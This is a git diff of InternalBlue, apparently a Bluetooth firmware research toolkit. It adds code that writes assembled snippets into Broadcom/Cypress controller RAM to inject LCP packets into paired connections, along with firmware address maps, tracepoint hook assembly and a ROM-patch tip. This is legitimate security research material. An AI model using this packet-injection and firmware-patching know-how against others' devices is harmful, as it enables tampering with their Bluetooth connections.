to a remote device which is paired and connected with our local device).
@@ -1312,8 +1398,8 @@ class InternalBlue:
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr)
asm_code_with_data = asm_code + ''.join([".byte 0x%02x\n" % ord(x)
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr) # type: str
asm_code_with_data = asm_code + ''.join([".byte 0x%02x\n" % ord(x)
for x in data.ljust(20, "\x00")])
# Assemble the snippet and write it to SENDLMP_CODE_BASE_ADDRESS
@@ -1327,7 +1413,45 @@ class InternalBlue:
log.warn("sendLmpPacket: launchRam failed!")
return False
def sendLcpPacket(self, conn_idx, payload):
# type: (ConnectionIndex, bytes) -> bool
"""
Inject a LCP packet into a Bluetooth LE connection (i.e. send a LCP packet
to a remote device which is paired and connected with our local device).
This is code requires assembly patches.
conn_idx: The connection index specifying the connection into which the
packet will be injected, starting at 0.
payload: The LCP opcode and payload of the LCP packet that will be injected.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in ['SENDLCP_CODE_BASE_ADDRESS', 'SENDLCP_ASM_CODE']:
if const not in dir(self.fw):
log.warn("sendLcpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLCP_ASM_CODE % (conn_idx, len(payload))
asm_code_with_data = asm_code + ''.join([".byte 0x%02x\n" % ord(x)
for x in payload.ljust(20, "\x00")])
# Assemble the snippet and write it to SENDLCP_CODE_BASE_ADDRESS
code = asm(asm_code_with_data, vma=self.fw.SENDLCP_CODE_BASE_ADDRESS, arch='thumb')
self.writeMem(self.fw.SENDLCP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLCP_CODE_BASE_ADDRESS):
return True
else:
log.warn("sendLcpPacket: launchRam failed!")
return False
def connectToRemoteDevice(self, bt_addr):
# type: (BluetoothAddress) -> None
"""
Send a HCI Connect Command to the firmware. This will setup
a connection (inserted into the connection structure) if the
@@ -1355,6 +1479,7 @@ class InternalBlue:
self.sendHciCommand(0x0405, bt_addr[::-1] + '\x00\x00\x00\x00\x00\x00\x01')
def connectToRemoteLEDevice(self, bt_addr, addr_type=0x00):
# type: (BluetoothAddress, int) -> None
"""
Send a HCI LE Create Connection Command to the firmware as
defined in the Bluetooth Core Specification 5.0 p. 1266.
@@ -1371,6 +1496,7 @@ class InternalBlue:
self.sendHciCommand(0x200d, '\x60\x00\x30\x00\x00' + p8(addr_type) + bt_addr[::-1] + '\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00')
def connectionStatusCallback(self, record):
# type: (Record) -> None
"""
HCI Callback function to detect HCI Events related to
Create Connection
@@ -1403,9 +1529,11 @@ class InternalBlue:
log.info("[Disconnect Complete: Handle=0x%x]" % (conn_handle))
def coexStatusCallback(self, record):
# type: (Record) -> None
"""
Coexistence Callback Function
Interprets debug counters for coexistence with WiFi/LTE
Call with "sendhcicmd 0xfc90"
"""
hcipkt = record[0] # get HCI Event packet
@@ -1419,10 +1547,14 @@ class InternalBlue:
if u16(hcipkt.data[1:3]) == 0xfc90: # Coex Statistics Cmd
coex_grant = u32(hcipkt.data[4:8])
coex_reject= u32(hcipkt.data[8:12])
log.info("[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]" % (coex_grant, coex_reject, coex_reject/float(coex_grant)))
ratio = 0
if coex_grant > 0:
ratio = coex_reject/float(coex_grant)
log.info("[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]" % (coex_grant, coex_reject, ratio))
return
def readHeapInformation(self):
# type: () -> Optional[Union[HeapInformation, bool]]
"""
Traverses the double-linked list of BLOC structs and returns them as a
list of dictionaries. The dicts have the following fields:
@@ -1516,6 +1648,7 @@ class InternalBlue:
def readQueueInformation(self):
# type: () -> Optional[List[QueueElement]]
"""
Traverses the double-linked list of QUEUE structs and returns them as a
list of dictionaries. The dicts have the following fields:
@@ -1541,7 +1674,7 @@ class InternalBlue:
for const in ['QUEUE_HEAD']:
if const not in dir(self.fw):
log.warn("readQueueInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
return None
# Read address of first queue struct:
first_queue_struct_address = u32(self.readMem(self.fw.QUEUE_HEAD, 4))
@@ -1555,22 +1688,13 @@ class InternalBlue:
if queue_fields[0] != u32("UEUQ"):
log.warn("readQueueInformation: QUEUE double-linked list contains non-QUEU element. abort.")
return None
current_element = {}
current_element["index"] = index
current_element["address"] = current_queue_struct_address
current_element["item_size"] = queue_fields[2] * 4 # Item size is measured in dwords (4 Byte)
current_element["capacity"] = queue_fields[3]
current_element["available_items"] = queue_fields[4]
current_element["free_slots"] = queue_fields[5]
current_element["queue_buf_start"] = queue_fields[6]
current_element["queue_buf_end"] = queue_fields[7]
current_element["next_item"] = queue_fields[8]
current_element["next_free_slot"] = queue_fields[9]
current_element["thread_waitlist"] = queue_fields[10]
current_element["waitlist_length"] = queue_fields[11]
current_element["next"] = queue_fields[12]
current_element["prev"] = queue_fields[13]
current_element["name"] = self.fw.QUEUE_NAMES[index]
current_element = QueueElement(index, current_queue_struct_address, queue_fields[2] * 4,
queue_fields[3], queue_fields[4], queue_fields[5], queue_fields[6],
queue_fields[7], queue_fields[8], queue_fields[9], queue_fields[10],
queue_fields[11], queue_fields[12], queue_fields[13],
self.fw.QUEUE_NAMES[index])
queuelist.append(current_element)
current_queue_struct_address = current_element["next"]
@@ -1579,6 +1703,7 @@ class InternalBlue:
return queuelist
def enableBroadcomDiagnosticLogging(self, enable):
# type: (bool) -> None
"""
Broadcom implemented their own H4 layer protocol. Normally H4 handles HCI
messages like HCI commands, SCO and ACL data, and HCI events. Their types are
@@ -1597,5 +1722,17 @@ class InternalBlue:
custom Bluetooth driver is required, which accepts diagnostic commands
and also forwards diagnostic message outputs to the BT Snoop Log.
"""
self.sendH4(hci.HCI.BCM_DIAG, '\xf0' + p8(enable))
if not self.serial:
self.sendH4(hci.HCI.BCM_DIAG, b'\xf0' + b'\x01' if enable else b'\x00')
# We can send the activation to the serial, but then the Android driver
# itself crashes when receiving diagnostic frames...
else:
log.warn("Diagnostic protocol requires modified Android driver!")
def _setupSockets(self):
raise NotImplementedError()
def _teardownSockets(self):
raise NotImplementedError()
internalblue/fw/README.md
+36 -75
View File
@@ -9,49 +9,65 @@ Results are based on real world testing, this list is very incomplete. If you kn
Vendor | Version | SubVersion | Firmware | Devices | Firmware Build Date
-------| ------- | ---------- | ----------- | ------- | ----------
0x000f | 0x04 | 0x4217 | BCM4329B1 | iPhone 4
0x000f | 0x04 | 0x4217 | BCM4329B1 | iPhone 4, Nexus One, iPod touch (A1367)
0x000f | 0x04 | 0x21d0 | BCM2046 | iMac 27" late 2009
0x000f | 0x04 | 0x422a | BCM4331 | MacBook Pro early 2011
0x000f | 0x04 | 0x4203 | | HP ProBook 6550b and 6450b
0x000f | 0x05 | 0x4203 | BCM2034B | Thinkpad T420
0x000f | 0x05 | 0x610d | | iPad A1395
0x000f | 0x06 | 0x220e | BCM20702A1 | Asus USB Bluetooth dongle
0x000f | 0x05 | 0x240c | BCM20733 | Magic Keyboard
0x000f | 0x06 | 0x220e | BCM20702A1 | Asus USB Bluetooth dongle, HP Elitebook 820 G2
0x000f | 0x06 | 0x229b | BCM20702A3 | MacBook Pro 13" mid 2012 (A1278)
0x000f | 0x06 | 0x4103 | BCM4330B1 | iPhone 4s
0x000f | 0x06 | 0x4196 | BCM20702B0 | MacBook Pro mid 2014, iMac (Retina 5k, 27", ultimo 2014)
0x000f | 0x06 | 0x410d | | BlackBerry Q5
0x000f | 0x06 | 0x4196 | BCM20702B0 | MacBook Pro mid 2014, iMac (Retina 5k, 27", ultimo 2014), MacBook Air 2017 13"
0x000f | 0x06 | 0x6109 | | Samsung Galaxy Note 10.1 2014 WiFi (SM-P600)
0x000f | 0x07 | 0x220f | BCM20736S | Equiva Radiator Thermostat CC-RT-BLE-EQ
0x000f | 0x07 | 0x2203 | BCM43342 | iPhone 5s
0x000f | 0x07 | 0x2209 | BCM43430A1 | Raspberry Pi 3 | Jun 2 2014
0x000f | 0x07 | 0x230f | BCM4356A2 | Xperia Z5
0x000f | 0x07 | 0x410d | BCM4334 | iPhone 5 (A1429)
0x000f | 0x07 | 0x6109 | BCM4335C0 (BCM4339) | Nexus 5, Xperia Z3 Compact, Samsung Galaxy Note 3, LG G4 (LG-h815), Samsung Galaxy Note 10.1 2014 WiFi (SM-P600) | Dec 11 2012
0x000f | 0x08 | 0x6119 | BCM4345C0 | Raspberry Pi 3+, Honor 8 | Aug 19 2014
0x000f | 0x07 | 0x4606 | BCM4324 | iPad Air (A1474)
0x000f | 0x07 | 0x6109 | BCM4335C0 (BCM4339) | Nexus 5, Xperia Z3 Compact, Samsung Galaxy Note 3, LG G4 (LG-h815) | Dec 11 2012
0x0131 | 0x08 | 0x1200 | | Philips Sonicare (Cypress SoC CY8C4247LQI-BL483, not sure if compatible)
0x000f | 0x08 | 0x21a1 | | MacBook Pro Retina 13" early 2015
0x000f | 0x08 | 0x21a6 | BCM20703A1 | MacBook Pro early 2015
0x000f | 0x08 | 0x21a7 | BCM20703A1 | MacBook Pro early 2015 (with security fix)
0x000f | 0x08 | 0x21a8 | BCM20703A1 | MacBook Pro early 2015 (with security fix, 10.14.6)
0x000f | 0x08 | 0x220b | CYW20706 | CYW920706 Evaluation Kit, same ROM as MacBook Pro 2016 | Oct 22 2015
0x000f | 0x08 | 0x220b | BCM20707 | Fitbit Ionic
0x000f | 0x08 | 0x2230 | BCM20703A2 | MacBook Pro 2016 (A1707) | Oct 22 2015
0x000f | 0x08 | 0x2246 | BCM20703A2 | MacBook Pro 2016
0x000f | 0x08 | 0x2247 | BCM20703A2 | MacBook Pro 2016 (with security fix)
0x000f | 0x08 | 0x224b | BCM20703A2 | MacBook Pro 2016, 2017
0x000f | 0x08 | 0x2246 | BCM20703A2 | MacBook Pro 2016 | Oct 22 2015
0x000f | 0x08 | 0x2247 | BCM20703A2 | MacBook Pro 2016 (with security fix) | Oct 22 2015
0x000f | 0x08 | 0x224b | BCM20703A2 | MacBook Pro 2016, 2017, iMac 2017 Retina 5k | Oct 22 2015
0x000f | 0x08 | 0x224c | BCM20703A2 | MacBook Pro 15" 2017 (A1707) | Oct 22 2015
0x000f | 0x08 | 0x240f | BCM4358A3 | Nexus 6P, Samsung Galaxy S6, Samsung Galaxy S6 edge | Oct 23 2014
0x000f | 0x08 | 0x4109 | BCM4345 | iPhone 6
0x000f | 0x08 | 0x4109 | BCM4345B0 | iPhone 6 (Tempranillo) | Jul 15 2013
0x000f | 0x08 | 0x430a | | iPad Pro 2016 (MLMW2FD/A)
0x000f | 0x08 | 0x6103 | BCM4355C0 | iPhone 7 (A1778) | Sep 14 2015
0x000f | 0x08 | 0x6106 | | Samsung Galaxy S7
0x000f | 0x08 | 0x617e | BCM4350 | MacBook Pro 2017 (Retina 12"), MacBook Pro (13", 2016)
0x000f | 0x08 | 0x6206 | | iPhone SE
0x000f | 0x08 | 0x6103 | BCM4355C0 | iPhone 7 A1778 (Elsa) | Sep 14 2015
0x000f | 0x08 | 0x6106 | | Samsung Galaxy S7, Huawei P20
0x000f | 0x08 | 0x617e | BCM4350 | MacBook Pro 2017 (Retina 12", 13"), MacBook Pro (13", 2016) | May 28 2013
0x000f | 0x08 | 0x6119 | BCM4345C0 | Raspberry Pi 3+, Honor 8, Xperia X | Aug 19 2014
0x000f | 0x08 | 0x6206 | BCM4345C1 | iPhone SE (Hans), iPod Touch 7th Generation (MVJ72FD/A) | Jan 27 2015
0x000f | 0x09 | 0x102f | BCM4355 | MacBook Air 2019 13" Retina | Mar 7 2017
0x000f | 0x09 | 0x112e | BCM4364B0 | iMac Retina 4K 21.5"/27" 2019 macOS Mojave 10.14.6 | Aug 21 2015
0x000f | 0x09 | 0x112f | BCM4364B0 | MacBook Pro 2019 13" 4x Thunderbold | Aug 21 2015
0x000f | 0x09 | 0x103f | BCM4364 | iMac Pro 2017
0x000f | 0x09 | 0x2023 | BCM4377B3 | MacBook Pro 2019 13" 2x Thunderbold (Formosa) | Feb 28 2018
0x000f | 0x09 | 0x203f | BCM4364 | MacBook Pro (13", 2018)
0x000f | 0x09 | 0x2040 | | Apple Watch Series 3
0x0131 | 0x09 | 0x4208 | CYW20819A1 | ULP BLE/BR/EDR Bluetooth 5 Wireless MCU Evaluation Kit CYW920819EVB-02 | May 22 2018
0x000f | 0x09 | 0x2043 | BCM4346B0 | MacBook Pro 2019 15"
0x0131 | 0x09 | 0x220c | CYW20819A1 | ULP BLE/BR/EDR Bluetooth 5 Wireless MCU Evaluation Kit CYW920819EVB-02 | May 22 2018
0x000f | 0x09 | 0x411a | BCM4347B0 (BCM4361B0) | Samsung Galaxy S8 | Jun 3 2016
0x0131 | 0x09 | 0x4208 | CYW20735B1 | BLE/BR Bluetooth 5.0 Evaluation Kit CYW920735Q60EVB-01 | Jan 18 2018
0x000f | 0x09 | 0x4208 | BCM4375B1 | Samsung Galaxy S10e, Samsung Galaxy S10, Samsung Galaxy S10+ (local version is 0x1111) | April 13 2018
0x000f | 0x09 | 0x420e | | iPhone XR, iPhone X
0x000f | 0x09 | 0x4208 | BCM4375B1 | Samsung Galaxy S10e, Samsung Galaxy S10, Samsung Galaxy S10+, Samsung Galaxy Note 10/10+ (local version is 0x1111) | April 13 2018
0x000f | 0x09 | 0x420e | BCM4347B1 | iPhone 8, XR, X | Oct 11 2016
0x0131 | 0x09 | 0x420e | CYW20739B1 | Bluetooth 5.0 BLE Evaluation Kit CYW920719Q40EVB-01 | Jan 17 2017
0x000f | 0x09 | 0x4307 | | iPhone XS, iPhone Xs Max
0x000f | 0x09 | 0x4309 | | Samsung Galaxy Note 9, Samsung Galaxy S9+
0x0131 | 0x09 | 0x6119 | BCM4345C0 | Raspberry Pi 4 with Bluetooth 5 patches, same ROM as 3+ | Aug 19 2014
0x000f | 0x09 | 0x4307 | BCM4377B2 | iPhone XS (Aladdin), iPhone Xs Max (Genie), iPad Pro 11" 3E149FD/A, iPad Pro 11" 3E148FD/A, iPad Pro 12.9" 3rd gen 3D941FD/A, iPad mini 5th gen 3F559FD/A, iPad Air 3rd gen 3F561FD/A
0x000f | 0x09 | 0x4309 | | Samsung Galaxy Note 9, Samsung Galaxy S9, S9+
0x0131 | 0x09 | 0x6119 | BCM4345C0 | Raspberry Pi 3+/4 --- *with Bluetooth 5 patches, same ROM as 3+* | Aug 19 2014
0x000f | 0x09 | 0x6214 | BCM4355C1 | iPad 6th gen 3D575FD/A, iPad 6th gen MRJN2FD/A, iPad 6th gen MR7J2FD/A A1893 (FigaroA)
0x000f | 0x0a | 0x4228 | BCM4378B1 | iPhone 11 (Hei), iPhone 11 Pro (Moana), iPhone 11 Pro Max (Tala) --- *announce BT 5.1 over the air despite being specified as BT 5 online*
@@ -73,6 +89,7 @@ There is a couple of issues causing trouble running *InternalBlue*, which are re
* CYW20735B1
* `Launch_RAM` works in principle, but threading seems to be broken if the executed code generates other HCI events.
A hook at `0xB0316` is a nice spot to implement a function that generates HCI events and can be called via the HCI command `0xfc19`.
The general solution seems to be `self.internalblue.patchRom(0x3d32e, "\x70\x47\x70\x47")` respectively `patch -a 0x3d32e --asm bx lr`, which fixes that the baud rate is set to a wrong value during `Launch_RAM`.
Firmware Version and Build Date
-------------------------------
@@ -84,62 +101,6 @@ On newer chips, the build information is located in the beginning of the stack.
hd 0x200400
Firmware Related Setup
----------------------
The following steps are required to use the CYW20735B1 evaluation kit as normal HCI device on Linux with BlueZ.
**1. Setup as HCI device**
You need to set the baud rate to 3 Mbit/s. Replace `/dev/ttyUSB0` with your device.
btattach -B /dev/ttyUSB0 -S 3000000
If this does not work directly, use:
stty -F /dev/ttyUSB0 3000000
btattach -B /dev/ttyUSB0
**2. Use with BlueZ**
Assuming that you already have a regular Bluetooth device, you new device is `hci1`.
hciconfig hci1 up
You can list your HCI devices:
hcitool dev
**3. Command line tools for connections**
Scanning for devices:
hcitool scan
hcitool lescan
Connections and pairing:
bluetoothctl
Enter into `bluetoothctl` command prompt:
power on
agent on
default-agent
scan on
Optional - accept connections:
advertise on
pairable on
discoverable on
Do a pairing and then connect:
pair aa:bb:cc:dd:ee:ff
connect aa:bb:cc:dd:ee:ff
internalblue/fw/fw.py
+13 -5
View File
@@ -23,11 +23,13 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from builtins import hex
from builtins import object
from pwn import log
class Firmware:
def __init__(self, version=None):
class Firmware(object):
def __init__(self, version=None, iOS=False):
"""
Load and initialize the actual firmware add-ons for Nexus 5, Raspi3, etc.
@@ -41,9 +43,15 @@ class Firmware:
# get LMP Subversion
log.info("Chip identifier: 0x%04x (%03d.%03d.%03d)" %
(version, version >> 13, (version & 0xf00) >> 8, version & 0xff))
try:
self.firmware = __import__(__name__ + '_' + hex(version), fromlist=[''])
log.info("Using fw_" + hex(version) + ".py")
# Fix for duplicate version number of evaluation board / iPhones
if iOS and version==0x420e:
self.firmware = __import__(__name__ + '_' + hex(version) + '_iphone', fromlist=[''])
log.info("Using fw_" + hex(version) + "_iphone.py")
else:
self.firmware = __import__(__name__ + '_' + hex(version), fromlist=[''])
log.info("Using fw_" + hex(version) + ".py")
except ImportError:
self.firmware = None
pass
@@ -54,7 +62,7 @@ class Firmware:
log.info("Loaded firmware information for " + self.firmware.FW_NAME + ".")
class MemorySection:
class MemorySection(object):
"""
All firmwares have memory sections that can be RAM, ROM or neither of both.
"""
internalblue/fw/fw_0x1111.py
+158
View File
@@ -0,0 +1,158 @@
from __future__ import absolute_import
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# Samsung S10/S10e/S10+
FW_NAME = "BCM4375B1"
# Device Infos
DEVICE_NAME = 0x207f2a
BD_ADDR = 0x2026e2
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x0013ffff, True, False), # Internal ROM
MemorySection(0x00160000, 0x0017ffff, False, True), # Patches
MemorySection(0x00200000, 0x00288000, False, True), # Internal Memory Cortex M3
MemorySection(0x00300000, 0x0037ffff, False, True),
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
PATCHRAM_VALUE_TABLE_ADDRESS = 0x160000
PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = False
BLOC_HEAD = 0x20075c
BLOC_NG = True
# Assembler snippet for tracepoints
# In contrast to the Nexus 5 patch, we uninstall ourselves automatically and use internal debug functions
# TODO S10e does no longer have a patch uninstall function... writemem works to remove patches, but copying
# Assembly of the original function from an eval board does not work...
#TRACEPOINT_BODY_ASM_LOCATION = 0x00218300
#TRACEPOINT_HOOKS_LOCATION = 0x00218500
#TRACEPOINT_HOOK_SIZE = 40
TRACEPOINT_HOOK_ASM = """
push {r0-r12, lr} // save all registers on the stack (except sp and pc)
ldr r6, =0x%x // addTracepoint() injects pc of original tracepoint here
mov r9, %d // addTracepoint() injects the patchram slot of the hook patch
bl 0x%x // addTracepoint() injects TRACEPOINT_BODY_ASM_LOCATION here
pop {r0-r12, lr} // restore registers
// branch back to the original instruction
b 0x%x // addTracepoint() injects the address of the tracepoint
"""
TRACEPOINT_BODY_ASM_SNIPPET = """
mov r8, lr // save link register in r8
b delete_slot
// dump registers like before
// save status register in r5
mrs r5, cpsr
// malloc HCI event buffer
mov r0, 0xff // event code is 0xff (vendor specific HCI Event)
mov r1, 76 // buffer size: size of registers (68 bytes) + type and length + 'TRACE_'
bl 0x6cfe2 // hci_allocateEventBlockWithLen(0xff, 78) #DONE
mov r4, r0 // save pointer to the buffer in r4
// append our custom header (the word 'TRACE_') after the event code and event length field
add r0, 2 // write after the length field
ldr r1, =0x43415254 // 'TRAC'
str r1, [r0]
add r0, 4 // advance the pointer.
ldr r1, =0x5f45 // 'E_'
strh r1, [r0]
add r0, 2 // advance the pointer. r0 now points to the start of the register values
// store pc
str r6, [r0] // r6 still contains the address of the original pc
add r0, 4 // advance the pointer.
// store sp
mov r1, 56 // 14 saved registers * 4
add r1, sp
str r1, [r0]
add r0, 4 // advance the pointer.
// store status register
str r5, [r0]
add r0, 4 // advance the pointer.
// store other registers
mov r1, sp
mov r2, 56
bl 0x2774 // memcpy(dst, src, len) #DONE
// send HCI buffer to the host
mov r0, r4 // r4 still points to the beginning of the HCI buffer
bl 0x6cfa8 // hci_sendEvent #DONE
// restore status register
msr cpsr_f, r5
bl 0x6af24 // bthci_event_vs_DBFW_CoreDumpRAMImageEvent #DONE
// not possible... could not find patch_uninstallPatchEntry(slot)
// -> disable TP by hand, we stored in r9
// TODO - does not work??
delete_slot:
mov r0, #0
mov r1, r0
lsl r0, r0, #0x2
ldr r3, =0x00310404
sub.w r0, r0, #0x400
add r3, #0x3c
add r0, r3
movw r2, #0xffff
str r2, [r0, #0x0]
ldr r0,=0x00310404
add r0, #0x2c
ldr r2, [r0,#0x0]
mov r3, #0x1
lsl r3, r1
bic r2, r3
str r2, [r0, #0x0]
mov lr, r8 // restore lr from r8
bx lr // return
.align
patchram:
.byte 0x04
.byte 0x04
.byte 0x31
.byte 0x00
"""
internalblue/fw/fw_0x2209.py
+99
View File
@@ -0,0 +1,99 @@
#!/usr/bin/env python2
# fw_0x6119.py
#
# All firmware specific data such as address offsets are collected
# in the fw.py file. Later versions of the framework will provide
# multiple copies of this file in order to target different firmware
# and chip versions.
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
# Firmware Infos
# This runs on Rasperry Pi 3
from builtins import object
FW_NAME = "BCM43430A1"
# Device Infos
DEVICE_NAME = 0x20401C
BD_ADDR = 0x201C64
# Memory Sections
class MemorySection(object):
def __init__(self, start_addr, end_addr, is_rom, is_ram):
self.start_addr = start_addr
self.end_addr = end_addr
self.is_rom = is_rom
self.is_ram = is_ram
def size(self):
return self.end_addr - self.start_addr
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x0, 0x90000, True , False),
MemorySection(0xd0000, 0xd8000, False, True ),
#MemorySection(0xe0000, 0x1f0000, True , False),
MemorySection(0x200000, 0x21ffff, False, True ),
#MemorySection(0x260000, 0x268000, True , False), # might crash? issue 14
#MemorySection(0x280000, 0x2a0000, True , False),
MemorySection(0x318000, 0x320000, False, False),
MemorySection(0x324000, 0x360000, False, False),
MemorySection(0x362000, 0x362100, False, False),
MemorySection(0x363000, 0x363100, False, False),
MemorySection(0x600000, 0x600800, False, False),
MemorySection(0x640000, 0x640800, False, False),
MemorySection(0x650000, 0x650800, False, False),
#MemorySection(0x680000, 0x800000, False, False)
]
# Connection Structure and Table
#CONNECTION_LIST_ADDRESS = 0x204ba8
CONNECTION_MAX = 11
CONNECTION_STRUCT_LENGTH = 0x150 # TODO
# Patchram
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = False
# Heap
BLOC_HEAD = 0x200588 # g_dynamic_memory_GeneralUsePools
BLOC_NG = True # Next Generation Bloc Buffer
# Snippet for sendLcpPacket()
SENDLCP_CODE_BASE_ADDRESS = 0x21a000
SENDLCP_ASM_CODE = """
push {r4,lr}
// we want to call lmulp_sendLcp(conn_index, input, length)
mov r0, %d // connection index, starts at 0
ldr r1, =payload
mov r2, %d // length
bl 0x8389A // lmulp_sendLcp
pop {r4,pc} // go back
.align // The payload (LMP packet) must be 4-byte aligend (memcpy needs aligned addresses)
payload: // Note: the payload will be appended here by the sendLmpPacket() function
"""
internalblue/fw/fw_0x220b.py
+46
View File
@@ -0,0 +1,46 @@
from __future__ import absolute_import
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW20706
FW_NAME = "CYW20706"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c7fff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True ),
MemorySection(0x00200000, 0x00247fff, False, True), # Internal Memory Cortex M3
]
# Patchram
#PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000
#PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310404
#PATCHRAM_VALUE_TABLE_ADDRESS = 0x0d0000
#PATCHRAM_NUMBER_OF_SLOTS = 256
PATCHRAM_ALIGNED = True
# only seems to work 4-byte aligned here ...
internalblue/fw/fw_0x220c.py
+3 -2
View File
@@ -1,3 +1,4 @@
from __future__ import absolute_import
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
@@ -20,11 +21,11 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from .fw import MemorySection
# Firmware Infos
# Evaluation Kit CYW920819
FW_NAME = "CYW20819"
FW_NAME = "CYW20819A1"
# Memory Sections
internalblue/fw/fw_0x220e.py
+2 -1
View File
@@ -23,7 +23,8 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from __future__ import absolute_import
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM20702A1 (USB Bluetooth dongle)"
internalblue/fw/fw_0x2230.py
+2 -1
View File
@@ -22,7 +22,8 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from __future__ import absolute_import
from .fw import MemorySection
# Firmware Infos
FW_NAME = "BCM20703A2 (MacBook Pro 2016)"
internalblue/fw/fw_0x240f.py
+2 -1
View File
@@ -25,7 +25,8 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from fw import MemorySection
from __future__ import absolute_import
from .fw import MemorySection
# Firmware Infos
# This runs on Nexus 6P, Samsung Galaxy S6, Samsung Galaxy S6 edge
internalblue/fw/fw_0x4109.py
+83
View File
@@ -0,0 +1,83 @@
# fw_0x420e.py
#
# Generic firmware file in case we do not know something...
#
# Copyright (c) 2019 Jiska Classen. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from .fw import MemorySection
# Firmware Infos
# iPhone 6
FW_NAME = "BCM4345B0"
# Memory Sections
# start, end, is_rom? is_ram?
SECTIONS = [ MemorySection(0x00000000, 0x000c07ff, True, False), # Internal ROM
MemorySection(0x000d0000, 0x000dffff, False, True), # Internal Memory Patchram Contents
MemorySection(0x00200400, 0x00201cff, False, True), # Internal Memory Cortex M3
]
# Patchram
PATCHRAM_TARGET_TABLE_ADDRESS = 0x310000 # needs to be aligned read
PATCHRAM_ENABLED_BITMAP_ADDRESS = 0x310204
PATCHRAM_VALUE_TABLE_ADDRESS = 0xd0000
PATCHRAM_NUMBER_OF_SLOTS = 128
PATCHRAM_ALIGNED = True
# Assembler snippet for the readMemAligned() function
READ_MEM_ALIGNED_ASM_LOCATION = 0x215000 # there is nothing free until 0xdffff, but 0x215000 looks okay during runtime
